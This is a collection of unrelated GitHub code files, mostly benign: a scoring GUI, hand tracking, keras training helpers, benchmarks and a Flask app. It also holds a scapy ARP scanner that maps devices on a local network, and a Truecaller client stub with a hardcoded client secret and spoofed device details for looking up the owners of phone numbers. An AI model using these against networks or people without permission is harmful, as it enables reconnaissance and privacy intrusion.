config['Bonus']['BP']\nBonusPoints = [(x.split(',')[0].strip(),\n x.split(',')[1].strip(),\n int(x.split(',')[2])) for x in BPList.split(':')]\n\n# extract the problem numbers BonusPoint, to be used to test for valid problems\nproblist = [pnum for pnum,pname,ppt in BonusPoints]\n\n# find the elegance files\n# the list entries will look like '01-JGH'\nele = [x.split('/')[-1].split('.')[0].upper() for x in glob.glob(problemFiles+'*.[eE][lL][eE]')]\n\n# DefaultPoints is the list of possible problems, from 00 to 99.\nDefaultPoints = [(\"{:0>2d}\".format(q), '', 1) for q in range(0,100)]\n\n# Team names\nTeams = set(x.split('/')[-1].split('.')[0].split('-')[1].upper() for x in glob.glob(problemFiles+'*.*'))\n\ndef test(*args):\n ''' callback procedure for checkbox changes '''\n #print (args, chkbtn[args[0]], intvar_dict[chkbtn[args[0]]].get())\n team_name = chkbtn[args[0]]\n team_state = intvar_dict[chkbtn[args[0]]].get()\n \n if team_state:\n #print('enable')\n files = open(problemFiles+'00-'+team_name+'.ELE','a')\n files.close()\n else:\n #print('disable')\n os.remove(problemFiles+'00-'+team_name+'.ELE')\n \n #for key, value in intvar_dict.items():\n # if value.get():\n # print('selected:', key, value, value.get())\n\nroot = Tk()\nroot.title('Score Settings')\n\nmainframe = ttk.Frame(root, padding=\"3 3 12 12\")\nmainframe.grid(column=0, row=0, sticky=(N, W, E, S))\nmainframe.columnconfigure(0, weight=1)\nmainframe.rowconfigure(0, weight=1)\nttk.Label(mainframe, text=\"Mark Teams\",background='white').grid(column=0, row=0, sticky=(W, E))\n\n# set up the checkbuttons and link to vars\nintvar_dict = {}\nj = 1\nfor t in Teams:\n j += 1\n # create the tk linked variable\n intvar_dict[t] = IntVar()\n # create the checkbox for team t and wire it to the tk linked variable\n c = ttk.Checkbutton(mainframe, text=t, variable=intvar_dict[t])\n # if there's an elegance file, set the checkbutton\n if '00-'+t in ele:\n intvar_dict[t].set(1)\n # Set the callback program when the variable changes\n intvar_dict[t].trace(\"w\", test)\n # place the checkbutton on the grid\n c.grid(column=0, row=j, sticky=(W, E))\n\n# chkbtn links teamnames to checkbutton variables\nchkbtn = {}\nfor child in intvar_dict:\n chkbtn[str(intvar_dict[child])] = child\n\n#intvar_dict['WESTVIEW'].set(1)\n\nroot.bind('', test)\nroot.mainloop()\n","repo_name":"jghafa/contest","sub_path":"scoregui.py","file_name":"scoregui.py","file_ext":"py","file_size_in_byte":3086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1615014439","text":"import 
cv2\r\nimport mediapipe as mp\r\n\r\ncap = cv2.VideoCapture(0)\r\nmpHands = mp.solutions.hands\r\nhands = mpHands.Hands()\r\nmpDraw = mp.solutions.drawing_utils\r\n\r\nwhile True:\r\n success, img = cap.read()\r\n RGBimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n results = hands.process(RGBimg)\r\n\r\n if results.multi_hand_landmarks:\r\n for handLms in results.multi_hand_landmarks:\r\n for id, lm in enumerate(handLms.landmark):\r\n #print(id,lm)\r\n h,w,c = img.shape\r\n cx,cy = int(lm.x*w), int(lm.y*h) #prints pixel coordinates\r\n print (id, cx, cy)\r\n\r\n mpDraw.draw_landmarks(img,handLms,mpHands.HAND_CONNECTIONS)\r\n\r\n\r\n cv2.imshow(\"Image\",img)\r\n\r\n if cv2.waitKey(1) & 0xFF == ord('q'): # if 'q' is pressed then quit\r\n break\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"ommpatel3/Finger-Math","sub_path":"fingertest.py","file_name":"fingertest.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"17955126232","text":"import scapy.all as scapy \nfrom src.deviceModel import NetworkDevice\nimport os\n\nclass NetworkScanner:\n def __init__(self, ipAddr_range='192.168.1.1/24', macAddr='ff:ff:ff:ff:ff:ff', timeout=2, verbose=False): # default ip address to home network format\n self.ipAddr_range = ipAddr_range\n self.macAddr = macAddr\n self.timeout = timeout\n self.verbose = verbose\n self.devices = [] # storing device objects\n self.unansweredDevices = []\n\n def scanNetwork(self, save_to_file=True):\n request = scapy.ARP(pdst=self.ipAddr_range)\n broadcast = scapy.Ether(dst=self.macAddr)\n requestBroadcast = broadcast / request\n allDevices = scapy.srp(requestBroadcast, timeout=self.timeout, verbose=self.verbose)\n answeredDevices = allDevices[0]\n unansweredDevices = allDevices[1]\n\n for element in answeredDevices:\n device = NetworkDevice(ipAddr= element[1].psrc, macAddr=element[1].hwsrc) # getting the IP and MAC address from the tuple\n self.devices.append(device)\n \n for requestPacket in unansweredDevices: # getting the IP address from the packet\n self.unansweredDevices.append(requestPacket.pdst)\n\n if save_to_file:\n main_directory = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))\n data_directory = f\"{main_directory}/data\"\n\n iplist_file = os.path.join(data_directory, \"iplist.txt\")\n unansweredIP_file = os.path.join(data_directory, \"unanswered-devices.txt\")\n\n\n with open(iplist_file, \"w\") as file:\n for device in self.devices:\n file.write(f\"{device.ipAddr}\\n\")\n \n with open(unansweredIP_file, \"w\") as file:\n for ip in self.unansweredDevices:\n file.write(f\"{ip}\\n\")\n\n \n ","repo_name":"gmturn/vulnerability-scanner","sub_path":"src/networkModel.py","file_name":"networkModel.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36689020595","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nfrom keras import backend as K\nimport matplotlib.pyplot as plt\nimport itertools\n\n'''\nDefine the metric Precision\nPercentage of correct classifications from all values classified as positive\n'''\ndef precision(y_true, y_pred):\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n return precision\n\n'''\nDefine the metric Recall\nPercentage of positive classes correctly 
classified\n'''\ndef recall(y_true, y_pred):\n    true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n    possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n    recall = true_positives / (possible_positives + K.epsilon())\n    return recall\n\n'''\nDefine Dice loss function\n'''\ndef dice_loss(y_true, y_pred, smooth=1e-6):\n    # convert types\n    y_true = tf.cast(y_true, tf.float32)\n    y_pred = tf.cast(y_pred, tf.float32)\n    # Dice coefficient\n    intersection = K.sum(K.abs(y_true * y_pred), axis=-1)\n    coefficient = (2. * intersection + smooth) / (K.sum(K.square(y_true),-1) + K.sum(K.square(y_pred),-1) + smooth)\n    # Dice loss\n    return 1 - coefficient\n\n'''\nCompile model and fit it to data\n'''\ndef compile_fit(model, loss, config, x_train, y_train, x_val, y_val):\n    learning_rate, epochs, batch_size = config\n    # compile model\n    if loss == 'binary_crossentropy':\n        model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate), \n                      loss='binary_crossentropy',\n                      metrics=[precision, recall])\n    elif loss == 'dice':\n        model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=learning_rate), \n                      loss=dice_loss,\n                      metrics=[precision, recall])\n    # fit model to data\n    history = model.fit(x_train, y_train, \n                        validation_data=(x_val, y_val), \n                        epochs=epochs, batch_size=batch_size, shuffle=True)\n    # plot learning curves\n    plot_learning_curves(history.history['loss'], history.history['val_loss'])\n    return model\n\n'''\nPredict changes from a pair of images\n'''\ndef predict_changes(model, images, image_size):\n    # reshape input data to fit the model\n    input_data = images.reshape(-1, image_size, image_size, 2)\n    # predict changes\n    prediction = model.predict(input_data)\n    prediction = prediction > 0.5\n    prediction = prediction.reshape(image_size, image_size)\n    return prediction\n\n'''\nPlot learning curves\n'''\ndef plot_learning_curves(loss, val_loss):\n    epochs = range(1, len(loss) + 1)\n    plt.plot(epochs, loss, 'y', label='Training loss')\n    plt.plot(epochs, val_loss, 'r', label='Validation loss')\n    plt.title('Training and validation loss')\n    plt.xlabel('Epochs')\n    plt.ylabel('Loss')\n    plt.legend()\n    plt.show()\n\n'''\nGenerate hyperparameter configurations\n'''\ndef generate_configs(learning_rate, epochs, batch_size):\n    configs = [learning_rate, epochs, batch_size]\n    configs = list(itertools.product(*configs))\n    print('Generated %s different configurations' % (len(configs)))\n    return configs \n\n'''\nGrid search for hyperparameters\n'''\ndef grid_search(model, loss, configs, x_train, y_train, x_val, y_val, x_test, y_test):\n    # evaluate configs\n    df_scores = pd.DataFrame(columns = ['learning_rate', 'epochs', 'batch_size', 'loss', 'precision', 'recall'])\n    for config in configs:\n        # note: the same model object is re-fit for every config, so weights carry over\n        # between configurations; rebuild the model per config if a fresh start is needed\n        model = compile_fit(model, loss, config, x_train, y_train, x_val, y_val)\n        metrics = model.evaluate(x_test, y_test)\n        new_row = {'learning_rate':config[0], 'epochs':config[1], 'batch_size':config[2], 'loss':metrics[0], 'precision':metrics[1], 'recall':metrics[2]}\n        # DataFrame.append was removed in pandas 2.x; concatenate a one-row frame instead\n        df_scores = pd.concat([df_scores, pd.DataFrame([new_row])], ignore_index=True)\n    # store scores\n    df_scores.to_csv('./scores.csv')
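\n\n# A minimal usage sketch (added illustration): the config values below are hypothetical\n# and the x_*/y_* arrays are assumed to be pre-split train/validation/test data:\n# configs = generate_configs([1e-3, 1e-4], [10], [32])\n# grid_search(model, 'dice', configs, x_train, y_train, x_val, y_val, x_test, y_test)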
","repo_name":"Gonkalos/LEI","sub_path":"Code/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"25942121076","text":"\"\"\"Collection of benchmarks and downstream tasks on embeddings\n\n.. autosummary::\n   :toctree: _autosummary\n\n   analogy\n   categorization\n   language_modeling\n   outliers\n   relation_extraction\n   sequence_labeling\n   similarity\n   synonymy_detection\n   text_classification\n\n\"\"\"\n\nimport argparse\nimport importlib\nfrom vecto.embeddings import load_from_dir\nfrom vecto.data import Dataset\nimport os\nfrom vecto.utils.data import save_json, print_json\nfrom vecto.utils import get_time_str\n\n\ndef list_benchmarks(benchmarks):\n    print(\"available benchmarks:\")\n    for i in benchmarks:\n        print(i)\n\n\ndef choose_benchmark(args):\n    # TODO: load benchmark names from modules themselves\n    available_benchmarks = []\n    available_benchmarks.append(\"analogy\")\n    available_benchmarks.append(\"categorization\")\n    available_benchmarks.append(\"language_modeling\")\n    available_benchmarks.append(\"relation_extraction\")\n    available_benchmarks.append(\"similarity\")\n    available_benchmarks.append(\"sequence_labeling\")\n    available_benchmarks.append(\"text_classification\")\n\n    parser = argparse.ArgumentParser(\n        description='run benchmarks',\n        add_help=True,\n        usage=\"vecto benchmark [name]\")\n\n    parser.add_argument('name', help='Subcommand to run')\n    args, remaining_args = parser.parse_known_args(args)\n    if args.name == \"help\":\n        list_benchmarks(available_benchmarks)\n        return\n    # TODO: implement running set of benchmarks defined in config\n    # if args.name == \"all\":\n    #     print(\"running all benchmarks\")\n\n    if args.name in available_benchmarks:\n        #print('remaining args')\n        #print(remaining_args)\n        run_benchmark_by_name(args.name, remaining_args)\n    else:\n        print(\"unknown benchmark name\", args.name)\n        list_benchmarks(available_benchmarks)\n        exit(-1)\n\n\ndef save_results(results, path_out, dataset_name):\n    # create subdirs unless explicitly asked to not do so\n    # TODO: add submodules to append to path\n    timestamp = get_time_str()\n    if isinstance(results, list):\n        task = results[0][\"experiment_setup\"][\"task\"]\n    else:\n        task = results[\"experiment_setup\"][\"task\"]\n    task = task.replace(\" \", \"_\")\n    name_file_out = os.path.join(path_out,\n                                 task,\n                                 dataset_name,\n                                 timestamp,\n                                 \"results.json\")\n    save_json(results, name_file_out)\n\n\ndef run_benchmark_by_name(name, args):\n    print(name, args)\n    print(\"running \", name)\n    mod = importlib.import_module(\"vecto.benchmarks.\" + name)\n    parser = argparse.ArgumentParser()\n    add_extra_args = getattr(mod, 'add_extra_args')\n    add_extra_args(parser)\n    parser.add_argument(\"--path_out\",\n                        default=None,\n                        help=\"destination folder to save results\")\n    args = parser.parse_args(args)\n    dict_args = vars(args)\n    embeddings = load_from_dir(args.embeddings)\n    # TODO: this is ugly hack, do subparsers or something\n    if name == \"language_modeling\":\n        dataset = Dataset(\"/tmp/\")\n        dataset.name = \"ptb\"\n    else:\n        dataset = Dataset(args.dataset)\n        dict_args.pop(\"dataset\")\n\n    dict_args.pop(\"embeddings\")\n    # TODO: not sure if all benchmarks use dataset arg\n    path_out = dict_args.pop(\"path_out\")\n    Benchmark = getattr(mod, \"Benchmark\")\n    benchmark = Benchmark(**dict_args)\n\n    print(\"SHAPE:\", embeddings.matrix.shape)\n    print(\"vocab size:\", embeddings.vocabulary.cnt_words)\n    results = benchmark.run(embeddings, dataset)\n    if path_out:\n        save_results(results, path_out, dataset.metadata[\"name\"])\n    else:\n        print_json(results)\n\n\ndef run_benchmarks_cli(args=[]):\n    
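# thin entry point kept for the vecto CLI; all argument handling happens in choose_benchmark\n    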
choose_benchmark(args)\n","repo_name":"vecto-ai/vecto","sub_path":"vecto/benchmarks/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"21"} +{"seq_id":"40395482833","text":"import unicodedata\nfrom collections import defaultdict\nfrom pprint import pprint\n\nDEFAULT_NAME = ''\nLETTER_PREFIX = 'L'\nNAME_FILTERS = ['cyrillic', 'greek']\n\n# http://vietunicode.sourceforge.net/charset/\nVIETNAMESE_RANGES = [\n range(0x0000, 0x007F + 1), # basic latin\n range(0x0080, 0x00FF + 1), # latin-1 supplement\n range(0x0100, 0x024F + 1), # latin extended A and B\n range(0x1E00, 0x1EFF + 1), # Latin Extended Additional\n range(0x0300, 0x036F + 1), # Combining Diacritical Marks\n range(0x20AB, 0X20AB + 1) # Dong currency symbol\n]\n\n# http://www.fileformat.info/info/unicode/block/index.htm\nCJK_RANGES = [\n range(0x4E00, 0x9FFF + 1),\n range(0x2E80, 0x2EFF + 1),\n range(0x3000, 0x303F + 1),\n range(0x31C0, 0x31EF + 1),\n range(0x3200, 0x32FF + 1),\n range(0x3300, 0x33FF + 1),\n range(0x3400, 0x4DBF + 1),\n range(0xF900, 0xFAFF + 1),\n range(0xFE30, 0xFE4F + 1),\n range(0x20000, 0x2A6DF + 1),\n range(0x2A700, 0x2B73F + 1),\n range(0x2B740, 0x2B81F + 1),\n range(0x2B820, 0x2CEAF + 1),\n range(0x2F800, 0x2FA1F + 1)\n]\n\nRANGES = {\n 'vietnamese': VIETNAMESE_RANGES,\n 'braille': [range(0x2800, 0x28FF + 1)],\n 'arabic': [range(0x0600, 0x06FF + 1)],\n 'cjk': CJK_RANGES\n}\n\ndef get_specific_category(character_number):\n for category_name, ranges in RANGES.items():\n for unicode_range in ranges:\n if character_number in unicode_range:\n return category_name\n\n return None\n\nwith open('znaki_wikipedii.txt') as f:\n lines = f.readlines()\n\ncategories = defaultdict(lambda: set())\n\nfor line in lines:\n for character in line:\n category = unicodedata.category(character)\n character_name = unicodedata.name(character, DEFAULT_NAME).lower()\n character_number = ord(character)\n\n specific_category = get_specific_category(character_number)\n if specific_category:\n categories[specific_category].add(character)\n if specific_category != 'vietnamese':\n continue\n\n if category[0] == LETTER_PREFIX:\n for name in NAME_FILTERS:\n if name in character_name:\n category += ' ' + name\n\n categories[category].add(character)\n\nfor category in sorted(categories):\n pprint('{}: {}'.format(category, ' '.join(sorted(categories[category]))), width=80)\n","repo_name":"florczakraf/tm2017","sub_path":"l01/z2/z2.py","file_name":"z2.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2484024491","text":"#!/usr/bin/env python3\n\n# Sockets Tutorial with Python 3 part 1 - sending and receiving data: https://youtu.be/Lbfe3-v7yE0\n# https://docs.python.org/3/library/socket.html\n\nimport socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nprint(socket.gethostname(), 9998)\ns.bind((socket.gethostname(), 9998))\n\ns.listen(5)\n\nwhile True:\n\tclientsocket, address = s.accept()\n\tprint(f\"Connection from {address} has been established!\")\n\n\tclientsocket.send(bytes(\"Welcome to the server!\", \"utf-8\"))\n\n\tclientsocket.close()\n","repo_name":"a2gs/pythonStudy","sub_path":"pyTCPClientServer/server1.py","file_name":"server1.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 
+{"seq_id":"31557189410","text":"import random\nimport requests\nfrom typing import Dict, List, Union\nimport phonenumbers\nfrom phonenumbers import parse as parse_phone_number\nfrom phonenumbers.phonenumberutil import region_code_for_country_code\nfrom ..data.phones_list import get_random_device\n\ndef generate_random_string(length: int) -> str:\n \"\"\"\n Generate a random string of the given length.\n\n Args:\n length (int): The length of the random string.\n\n Returns:\n str: The generated random string.\n \"\"\"\n characters = \"abcdefghijklmnopqrstuvwxyz0123456789\"\n return ''.join(random.choice(characters) for _ in range(length))\n\n\ndef login(phone_number: str) -> Dict[str, Union[str, int]]:\n \"\"\"\n Login to Truecaller.\n\n Args:\n phone_number (str): Phone number in international format.\n\n Returns:\n dict: The login response containing the requestId used for OTP verification.\n\n Raises:\n ValueError: If the phone number is invalid.\n requests.exceptions.RequestException: If an error occurs during the API request.\n \"\"\"\n pn = parse_phone_number(phone_number, None)\n device = get_random_device()\n\n if not pn or not pn.country_code or not pn.national_number:\n raise ValueError(\"Invalid phone number.\")\n\n post_url = \"https://account-asia-south1.truecaller.com/v2/sendOnboardingOtp\"\n\n data = {\n \"countryCode\": str(region_code_for_country_code(pn.country_code)),\n \"dialingCode\": pn.country_code,\n \"installationDetails\": {\n \"app\": {\n \"buildVersion\": 5,\n \"majorVersion\": 11,\n \"minorVersion\": 7,\n \"store\": \"GOOGLE_PLAY\",\n },\n \"device\": {\n \"deviceId\": generate_random_string(16),\n \"language\": \"en\",\n \"manufacturer\": device[\"manufacturer\"],\n \"model\": device[\"model\"],\n \"osName\": \"Android\",\n \"osVersion\": \"10\",\n \"mobileServices\": [\"GMS\"],\n },\n \"language\": \"en\",\n },\n \"phoneNumber\": str(pn.national_number),\n \"region\": \"region-2\",\n \"sequenceNo\": 2,\n }\n\n headers = {\n \"content-type\": \"application/json; charset=UTF-8\",\n \"accept-encoding\": \"gzip\",\n \"user-agent\": \"Truecaller/11.75.5 (Android;10)\",\n \"clientsecret\": \"lvc22mp3l1sfv6ujg83rd17btt\",\n }\n\n response = requests.post(post_url, json=data, headers=headers)\n return response.json()\n\n\ndef verify_otp(phone_number: str, json_data: Dict[str, str], otp: str) -> Dict[str, Union[str, int]]:\n \"\"\"\n Verify the OTP (One-Time Password) for phone number verification.\n\n Args:\n phone_number (str): The phone number in international format.\n json_data (dict): The JSON response data from the login request containing the requestId.\n otp (str): The OTP to verify.\n\n Returns:\n dict: The verification response containing the result of the OTP verification.\n\n Raises:\n ValueError: If the phone number is invalid.\n requests.exceptions.RequestException: If an error occurs during the API request.\n \"\"\"\n try:\n parsed_number = parse_phone_number(phone_number)\n if not phonenumbers.is_valid_number(parsed_number):\n raise ValueError(\"Phone number should be in international format.\")\n\n country_code = str(region_code_for_country_code(\n parsed_number.country_code))\n dialing_code = parsed_number.country_code\n phone_number = str(parsed_number.national_number)\n\n post_data = {\n \"countryCode\": country_code,\n \"dialingCode\": dialing_code,\n \"phoneNumber\": phone_number,\n \"requestId\": json_data[\"requestId\"],\n \"token\": otp,\n }\n\n headers = {\n \"content-type\": \"application/json; charset=UTF-8\",\n \"accept-encoding\": 
\"gzip\",\n \"user-agent\": \"Truecaller/11.75.5 (Android;10)\",\n \"clientsecret\": \"lvc22mp3l1sfv6ujg83rd17btt\",\n }\n\n url = \"https://account-asia-south1.truecaller.com/v1/verifyOnboardingOtp\"\n\n response = requests.post(url, json=post_data, headers=headers)\n return response.json()\n\n except phonenumbers.phonenumberutil.NumberParseException:\n raise ValueError(\"Invalid phone number.\")\n\n\ndef search(phone_number: str, country_code: str, installation_id: str) -> Dict[str, any]:\n \"\"\"\n Search for a phone number using Truecaller API.\n\n Args:\n phone_number (str): The phone number to search.\n country_code (str): The country code of the phone number.\n installation_id (str): The installation ID for authorization.\n\n Returns:\n dict: The search result containing information about the phone number.\n\n Raises:\n requests.exceptions.RequestException: If an error occurs during the API request.\n \"\"\"\n phone_number = parse_phone_number(phone_number, country_code)\n significant_number = phone_number.national_number\n\n headers = {\n \"content-type\": \"application/json; charset=UTF-8\",\n \"accept-encoding\": \"gzip\",\n \"user-agent\": \"Truecaller/11.75.5 (Android;10)\",\n \"Authorization\": f\"Bearer {installation_id}\"\n }\n params = {\n \"q\": str(significant_number),\n \"countryCode\": phone_number.country_code,\n \"type\": 4,\n \"locAddr\": \"\",\n \"placement\": \"SEARCHRESULTS,HISTORY,DETAILS\",\n \"encoding\": \"json\"\n }\n response = requests.get(\n \"https://search5-noneu.truecaller.com/v2/search\", params=params, headers=headers)\n\n response_data = response.json()\n return response_data\n\n\ndef bulk_search(phone_numbers: List[str], country_code: str, installation_id: str) -> Dict[str, any]:\n \"\"\"\n Perform bulk search for a list of phone numbers using Truecaller API.\n\n Args:\n phone_numbers (List[str]): The list of phone numbers to search.\n country_code (str): The country code of the phone numbers.\n installation_id (str): The installation ID for authorization.\n\n Returns:\n dict: The bulk search result containing information about the phone numbers.\n\n Raises:\n requests.exceptions.RequestException: If an error occurs during the API request.\n \"\"\"\n headers = {\n \"content-type\": \"application/json; charset=UTF-8\",\n \"accept-encoding\": \"gzip\",\n \"user-agent\": \"Truecaller/11.75.5 (Android;10)\",\n \"Authorization\": f\"Bearer {installation_id}\"\n }\n params = {\n \"q\": phone_numbers,\n \"countryCode\": country_code,\n \"type\": 14,\n \"placement\": \"SEARCHRESULTS,HISTORY,DETAILS\",\n \"encoding\": \"json\"\n }\n response = requests.get(\n \"https://search5-noneu.truecaller.com/v2/bulk\", params=params, headers=headers)\n\n response_data = response.json()\n return response_data\n","repo_name":"sumithemmadi/truecallerpy","sub_path":"src/truecallerpy/typings/truecallerpy.pyi","file_name":"truecallerpy.pyi","file_ext":"pyi","file_size_in_byte":6873,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"21"} +{"seq_id":"24227754395","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 20 00:11:41 2021\n\n@author: loic\n\"\"\"\n\nfrom flask import Blueprint, Flask, redirect , url_for , render_template, request, session, flash, jsonify\nfrom flask_login import login_required, current_user\nfrom .models import Candidat,User\nfrom . 
import db\nimport json\n\ncandidats = Blueprint('candidats',__name__)\n\n@candidats.route(\"/personnelle\")\n@login_required\ndef personnelle():\n if current_user.compte not in [\"candidat\",\"admin\"]:\n flash(\"vous n'êtes pas un candidat !\",'fail')\n return redirect(url_for(\"views.matching\"))\n else:\n profil_image = url_for(\"static\",filename=f\"images/{current_user.profil_image}\")\n return render_template(\"/candidat/personelle.html\",profil_image = profil_image)\n\n\n@candidats.route(\"/profil\")\n@login_required\ndef profil():\n if current_user.compte not in [\"candidat\",\"admin\"]:\n flash(\"vous n'êtes pas un candidat !\",'fail')\n return redirect(url_for(\"views.matching\"))\n else:\n return render_template(\"/candidat/profil.html\")\n\n\n@candidats.route(\"/approfondir\")\n@login_required\ndef approfondir():\n if current_user.compte not in [\"candidat\",\"admin\"]:\n flash(\"vous n'êtes pas un candidat !\",'fail')\n return redirect(url_for(\"views.matching\"))\n else:\n return render_template(\"/candidat/approfondir.html\")\n","repo_name":"fiastros/finder","sub_path":"app/website/candidats.py","file_name":"candidats.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43168614767","text":"import argparse\nimport dataclasses\nimport hashlib\nimport http.client\nimport logging\nimport sys\nfrom datetime import datetime\n\nimport pds.api_client # type: ignore\nfrom pds.api_client.exceptions import ApiAttributeError # type: ignore\nfrom pds.api_client.exceptions import NotFoundException # type: ignore\nfrom pds.api_client.model.pds_product import PdsProduct # type: ignore\n\nfrom . import VERSION\nfrom .aip import writelabel as writeaiplabel\nfrom .constants import AIP_SIP_DEFAULT_VERSION\nfrom .constants import PDS_LABEL_FILENAME_EXTENSION\nfrom .constants import PDS_TABLE_FILENAME_EXTENSION\nfrom .constants import PROVIDER_SITE_IDS\nfrom .sip import writelabel as writesiplabel\nfrom .utils import addbundlearguments\nfrom .utils import addloggingarguments\n# Import entity classes: in this case we just need class ``Product``.\n#\n# 😛 Apparently this API changes with the phase of the moon. See, in some versions of pds.api-client,\n# the name of the ``model`` package is ``model``, singular. But then seemingly at random, it becomes\n# ``models`` plural. And even some releases support *both*. So here we try to accomodate whatever the\n# flavor du jour is.\n# If this fails to import, then we're using a pds.api-client ≤ 0.5.0, which I'm arbitrarily declaring \"too old\":\n\n# Import functional endpoints.\n#\n# 😛 Apparently this API changes more more frequently than a fringe politician's platform. See, in\n# some versions of pds.api-client, the endpoint classes are importable directly from ``pds.api_client``.\n# And in other releases, they're not. And it seems to swap randomly. 
So here we try to be resilient\n# to whatever the pds.api-client we get stuck with.\ntry:\n from pds.api_client import CollectionsProductsApi, BundlesCollectionsApi, BundlesApi # type: ignore\nexcept ImportError:\n from pds.api_client.api.bundles_api import BundlesApi # type: ignore\n from pds.api_client.api.bundles_collections_api import BundlesCollectionsApi # type: ignore\n from pds.api_client.api.collections_products_api import CollectionsProductsApi # type: ignore\n\n\n# Constants\n# =========\n#\n# Logging\n# -------\n\n_logger = logging.getLogger(__name__) # The one true logger for PDS\n_progresslogging = 100 # How frequently to report PDS progress; every N items\n\n\n# PDS API Access\n# --------------\n\n_apiquerylimit = 50 # Pagination in the PDS API\n_defaultserver = \"https://pds.nasa.gov/api/search/1.0/\"\n\n\n# PDS API property keys we're interested in\n# -----------------------------------------\n\n_propdataurl = \"ops:Data_File_Info.ops:file_ref\"\n_propdatamd5 = \"ops:Data_File_Info.ops:md5_checksum\"\n_proplabelurl = \"ops:Label_File_Info.ops:file_ref\"\n_proplabelmd5 = \"ops:Label_File_Info.ops:md5_checksum\"\n_fields = [_propdataurl, _propdatamd5, _proplabelurl, _proplabelmd5]\n\n\n# Program/Module Metadata\n# -----------------------\n\n_description = \"\"\"Generate \"PDS deep archives\" of PDS data bundles from the PDS Registry Service, which\nincludes PDS Archive Information Packages (AIPs) and PDS Submission Information Packages (SIPs). If you\nhave a PDS bundle locally in your filesystem, use ``pds-deep-archive`` instead. This program is intended\nfor when the PDS bundle is remotely available via the HTTP PDS application programmer interface (API).\"\"\"\n__version__ = VERSION\n\n\n# Classes\n# =======\n\n\n@dataclasses.dataclass(order=True, frozen=True)\nclass _File:\n \"\"\"A \"PDS file\" of some kind in the PDS Registry Service whose details we get via the PDS API.\"\"\"\n\n url: str\n md5: str\n\n\ndef _deurnlidvid(lidvid: str) -> tuple[str, str]:\n \"\"\"De-URN a LID VID.\n\n Given a PDS ``lidvid`` as a Uniform Resource Name such as ``urn:nasa:pds:whatever::1.0``,\n transform it to a double of ``whatever`` and ``1.0``.\n \"\"\"\n lid, vid = lidvid.split(\"::\")\n return lid.split(\":\")[-1], vid\n\n\ndef _makefilename(lidvid: str, ts: datetime, kind: str, ext: str) -> str:\n \"\"\"Make a filename.\n\n Make a PDS filename for the given ``lidvid`` by dropping its URN prefix, splitting it into\n LID and VID, adding the date part of the ``ts`` timestamp, slapping on the ``kind`` of file it\n is, and the given ``ext``ension, which should already include the ``.``.\n \"\"\"\n lid, vid = _deurnlidvid(lidvid)\n slate = ts.date().strftime(\"%Y%m%d\")\n return f\"{lid}_v{vid}_{slate}_{kind}_v{AIP_SIP_DEFAULT_VERSION}{ext}\"\n\n\ndef _getbundle(apiclient: pds.api_client.ApiClient, lidvid: str) -> PdsProduct:\n \"\"\"Get a bundle.\n\n Using the PDS ``apiclient`` find the PDS bundle with the named ``lidvid``\n and return as a ``pds.api_client.models.pds_product.PdsProduct``. 
If it\n can't be found, return ``None``.\n \"\"\"\n try:\n _logger.debug(\"⚙️ Asking ``bundle_by_lidvid`` for %s\", lidvid)\n bundles = BundlesApi(apiclient)\n return bundles.bundle_by_lidvid(lidvid) # type = ``Product_Bundle``\n except pds.api_client.exceptions.ApiException as ex:\n if ex.status == http.client.NOT_FOUND:\n return None\n else:\n raise\n\n\ndef _getcollections(apiclient: pds.api_client.ApiClient, lidvid: str, allcollections=True):\n \"\"\"Get the collections.\n\n Using the PDS ``apiclient`` generate collections that belong to the PDS bundle ``lidvid``.\n\n If ``allcollections`` is True, then return all collections for LID-only references; otherwise\n return just the latest collection for LID-only references (has no effect on full LIDVID-references.\n \"\"\"\n bcapi, start = BundlesCollectionsApi(apiclient), 0\n while True:\n _logger.debug('⚙️ Asking ``collections_of_a_bundle`` for %s at %d limit %d', lidvid, start, _apiquerylimit)\n\n try:\n if allcollections:\n results = bcapi.collections_of_a_bundle_all(lidvid, start=start, limit=_apiquerylimit, fields=_fields)\n else:\n results = bcapi.collections_of_a_bundle_latest(\n lidvid, start=start, limit=_apiquerylimit, fields=_fields\n )\n if len(results.data) == 0: return\n start += len(results.data)\n for i in results.data:\n yield i\n\n except NotFoundException: # end of the pages\n return\n\n\ndef _getproducts(apiclient: pds.api_client.ApiClient, lidvid: str):\n \"\"\"Using the PDS ``apiclient`` generate PDS products that belong to the collection ``lidvid``.\"\"\"\n cpapi, start = CollectionsProductsApi(apiclient), 0\n while True:\n try:\n _logger.debug(\"⚙️ Asking ``products_of_a_collection`` for %s at %d limit %d\", lidvid, start, _apiquerylimit)\n results = 